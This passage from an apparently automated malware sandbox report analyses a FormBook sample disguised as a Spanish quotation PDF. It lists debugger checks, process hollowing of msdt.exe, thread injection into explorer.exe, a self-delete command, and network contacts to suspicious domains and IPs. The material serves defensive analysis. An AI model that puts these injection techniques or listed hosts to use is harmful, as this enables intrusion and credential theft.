          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04638E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04648EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04618794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04694257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04618A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04623A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04633B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04633B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04611B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04611B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.afxwn.icu
          Source: C:\Windows\explorer.exeDomain query: www.weqffg.site
          Source: C:\Windows\explorer.exeNetwork Connect: 156.234.12.248 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeDomain query: www.analytics-at-scale.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.233.244 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: EB0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.342217712.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.323174188.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.302058539.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.402407831.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000007.00000000.329823325.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.350785611.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.334195852.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.312931928.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
